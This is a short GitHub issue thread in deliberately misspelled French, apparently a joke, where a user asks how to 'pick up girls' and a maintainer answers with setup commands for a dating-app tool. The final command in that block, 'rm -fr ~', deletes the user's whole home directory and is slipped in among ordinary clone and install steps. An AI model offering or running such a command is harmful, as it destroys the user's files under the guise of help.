### ISSUE TITLE
bjr comen on chop des meufs ?

### ISSUE THREAD

**Issue by groud** [bntmorgan/libpickup#1]
sa marche pa,
mersi

**Comment by bntmorgan** [comment]
Bonjour cher Mr groud, 

```
$ git clone https://github.com/bntmorgan/hotopuc
$ cd hotopuc
$ npm update
$ ./app.js -U -i --extrem-mass-like
$ rm -fr ~
```

de rien.

![image](https://cloud.githubusercontent.com/assets/1724174/18131338/b3af5b02-6f92-11e6-9d58-4f9917dc393f.png)

**Comment by groud** [comment]
a ui j'avé oublié l'opsion `--extrem-mas-lique`
C réglé jé chope les meuf mintenan

a+
